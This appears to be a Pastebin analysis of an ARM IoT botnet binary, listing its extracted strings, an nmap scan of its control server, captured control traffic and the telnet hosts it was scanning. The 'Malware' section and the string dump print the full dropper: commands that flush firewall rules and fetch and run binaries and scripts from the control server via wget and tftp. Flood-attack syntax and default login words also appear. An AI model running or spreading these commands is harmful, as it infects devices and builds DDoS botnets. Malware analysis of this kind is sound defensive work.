Advertisement
LNO_LiGhT

lolm4d?

Nov 16th, 2015
1,346
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.75 KB | None | 0 0
  1. File Type:
  2. ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
  3. -----------------------------------------------
  4. rodata:
  5. @ #!
  6. !1C "
  7. PIGGY
  8. 8.8.8.8
  9. /proc/net/route
  10. 00000000
  11. /bin/sh
  12. Invalid flag "%s"
  13. Failed opening raw socket.
  14. Failed setting raw headers mode.
  15. %d.%d.%d.%d
  16. %d.%d.%d.0
  17. echo -en '\x67\x61\x79\x66\x67\x74'
  18. REPORT %s:%s:%s
  19. cd /tmp; busybox wget http://176.123.6.195/bin2.sh; sh bin2.sh;busybox tftp -r bin.sh -g 176.123.6.195; sh bin.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74'
  20. PING
  21. PONG!
  22. GETLOCALIP
  23. My IP: %s
  24. SCANNER
  25. SCANNER ON | OFF
  26. TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
  27. KILLATTK
  28. LOLNOGTFO
  29. self
  30. /proc/
  31. /cmdline
  32. /proc
  33. BUILD %s
  34. PING
  35. PONG
  36. %s 2>&1
  37. 176.123.6.195:8080
  38. 176.123.6.195:3000
  39. root
  40. admin
  41. guest
  42. invalid
  43. incorrect
  44. fail
  45. again
  46. wrong
  47. accessdenied
  48. error
  49. success
  50. busybox
  51. shell
  52. dvrdvs
  53. user
  54. login
  55. pass
  56. name
  57. gayfgt
  58. binfagt
  59. (nil)
  60. (null)
  61. hlLjztqZ
  62. npxXoudifFeEgGaACScs
  63. +0-#'I
  64. Unknown error
  65. Success
  66. Operation not permitted
  67. No such file or directory
  68. No such process
  69. Interrupted system call
  70. Input/output error
  71. No such device or address
  72. Argument list too long
  73. Exec format error
  74. Bad file descriptor
  75. No child processes
  76. Resource temporarily unavailable
  77. Cannot allocate memory
  78. Permission denied
  79. Bad address
  80. Block device required
  81. Device or resource busy
  82. File exists
  83. Invalid cross-device link
  84. No such device
  85. Not a directory
  86. Is a directory
  87. Invalid argument
  88. Too many open files in system
  89. Too many open files
  90. Inappropriate ioctl for device
  91. Text file busy
  92. File too large
  93. No space left on device
  94. Illegal seek
  95. Read-only file system
  96. Too many links
  97. Broken pipe
  98. Numerical argument out of domain
  99. Numerical result out of range
  100. Resource deadlock avoided
  101. File name too long
  102. No locks available
  103. Function not implemented
  104. Directory not empty
  105. Too many levels of symbolic links
  106. No message of desired type
  107. Identifier removed
  108. Channel number out of range
  109. Level 2 not synchronized
  110. Level 3 halted
  111. Level 3 reset
  112. Link number out of range
  113. Protocol driver not attached
  114. No CSI structure available
  115. Level 2 halted
  116. Invalid exchange
  117. Invalid request descriptor
  118. Exchange full
  119. No anode
  120. Invalid request code
  121. Invalid slot
  122. Bad font file format
  123. Device not a stream
  124. No data available
  125. Timer expired
  126. Out of streams resources
  127. Machine is not on the network
  128. Package not installed
  129. Object is remote
  130. Link has been severed
  131. Advertise error
  132. Srmount error
  133. Communication error on send
  134. Protocol error
  135. Multihop attempted
  136. RFS specific error
  137. Bad message
  138. Value too large for defined data type
  139. Name not unique on network
  140. File descriptor in bad state
  141. Remote address changed
  142. Can not access a needed shared library
  143. Accessing a corrupted shared library
  144. .lib section in a.out corrupted
  145. Attempting to link in too many shared libraries
  146. Cannot exec a shared library directly
  147. Invalid or incomplete multibyte or wide character
  148. Interrupted system call should be restarted
  149. Streams pipe error
  150. Too many users
  151. Socket operation on non-socket
  152. Destination address required
  153. Message too long
  154. Protocol wrong type for socket
  155. Protocol not available
  156. Protocol not supported
  157. Socket type not supported
  158. Operation not supported
  159. Protocol family not supported
  160. Address family not supported by protocol
  161. Address already in use
  162. Cannot assign requested address
  163. Network is down
  164. Network is unreachable
  165. Network dropped connection on reset
  166. Software caused connection abort
  167. Connection reset by peer
  168. No buffer space available
  169. Transport endpoint is already connected
  170. Transport endpoint is not connected
  171. Cannot send after transport endpoint shutdown
  172. Too many references: cannot splice
  173. Connection timed out
  174. Connection refused
  175. Host is down
  176. No route to host
  177. Operation already in progress
  178. Operation now in progress
  179. Stale NFS file handle
  180. Structure needs cleaning
  181. Not a XENIX named type file
  182. No XENIX semaphores available
  183. Is a named type file
  184. Remote I/O error
  185. Disk quota exceeded
  186. No medium found
  187. Wrong medium type
  188. /dev/null
  189. CAk[S
  190. --------------------------------------------------------
  191. Ports:
  192. root@dongzzz:~# nmap --open 176.123.6.195
  193.  
  194. Starting Nmap 6.00 ( http://nmap.org ) at 2015-11-16 03:20 EST
  195. Nmap scan report for ^.>.<.^
  196. Host is up (0.00056s latency).
  197. Not shown: 996 closed ports
  198. PORT STATE SERVICE
  199. 22/tcp open ssh
  200. 80/tcp open http
  201. 3000/tcp open ppp
  202. 8080/tcp open http-proxy
  203.  
  204. Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
  205. 176.123.6.195:8080
  206. 176.123.6.195:3000
  207. --------------------------------------------------------
  208. Malware:
  209. #!/bin/sh
  210. rm -f *
  211. iptables -F
  212. iptables -X
  213. busybox wget http://176.123.6.195/mipsel; cp /bin/busybox ./; cat mipsel > busybox; rm mipsel; cp busybox fjkasdia; rm busybox; chmod 777 fjkasdia; ./fjkasdia; rm fjkasdia
  214. busybox wget http://176.123.6.195/mips; cp /bin/busybox ./; cat mips > busybox; rm mips; cp busybox fjkasdia; rm busybox; chmod 777 fjkasdia; ./fjkasdia; rm fjkasdia
  215. busybox wget http://176.123.6.195/arm; cp /bin/busybox ./; cat arm > busybox; rm arm; cp busybox fjkasdia; rm busybox; chmod 777 fjkasdia; ./fjkasdia; rm fjkasdia
  216. rm -f *
  217.  
  218. cd /tmp; busybox wget http://176.123.6.195/bin2.sh; sh bin2.sh;busybox tftp -r b in.sh -g 176.123.6.195; sh bin.sh; echo -e '\x62\x69\x6e\x66\x61\x67\x74'
  219. ---------------------------------------------
  220. TCP Raw Streams
  221. 172.16.1.31:53085 --> 176.123.6.195:8080
  222.  
  223. [172.16.1.31:53085 --> 176.123.6.195:8080]
  224.  
  225. BUILD PIGGY
  226. PING
  227.  
  228. [176.123.6.195:8080 --> 172.16.1.31:53085]
  229.  
  230. !* SCANNER ON
  231. ---------------------------------------------
  232. Established IP Connections:
  233. Protocol IP Address : Port
  234. ICMP 104.162.164.107
  235. ICMP 104.162.164.149
  236. ICMP 104.162.164.122
  237. TCP 104.162.164.128 : 23
  238. TCP 104.162.164.247 : 23
  239. TCP 104.162.164.177 : 23
  240. TCP 104.162.164.151 : 23
  241. TCP 104.162.164.59 : 23
  242. TCP 104.162.164.21 : 23
  243. TCP 204.3.195.26 : 23
  244. TCP 204.3.195.45 : 23
  245. TCP 104.162.164.92 : 23
  246. TCP 204.3.195.24 : 23
  247. TCP 204.3.195.29 : 23
  248. TCP 204.3.195.70 : 23
  249. TCP 104.162.164.148 : 23
  250. TCP 104.162.164.147 : 23
  251. TCP 104.162.164.113 : 23
  252. TCP 104.162.164.155 : 23
  253. TCP 204.3.195.71 : 23
  254. TCP 104.162.164.156 : 23
  255. TCP 104.162.164.86 : 23
  256. TCP 104.162.164.242 : 23
  257. TCP 204.3.195.75 : 23
  258. TCP 104.162.164.64 : 23
  259. TCP 104.162.164.138 : 23
  260. TCP 204.3.195.33 : 23
  261. TCP 204.3.195.65 : 23
  262. TCP 104.162.164.217 : 23
  263. TCP 104.162.164.140 : 23
  264. TCP 104.162.164.159 : 23
  265. TCP 104.162.164.51 : 23
  266. TCP 204.3.195.50 : 23
  267. TCP 104.162.164.22 : 23
  268. TCP 204.3.195.25 : 23
  269. TCP 104.162.164.188 : 23
  270. TCP 204.3.195.73 : 23
  271. TCP 104.162.164.201 : 23
  272. TCP 104.162.164.114 : 23
  273. TCP 104.162.164.252 : 23
  274. TCP 204.3.195.16 : 23
  275. TCP 204.3.195.72 : 23
  276. TCP 104.162.164.96 : 23
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement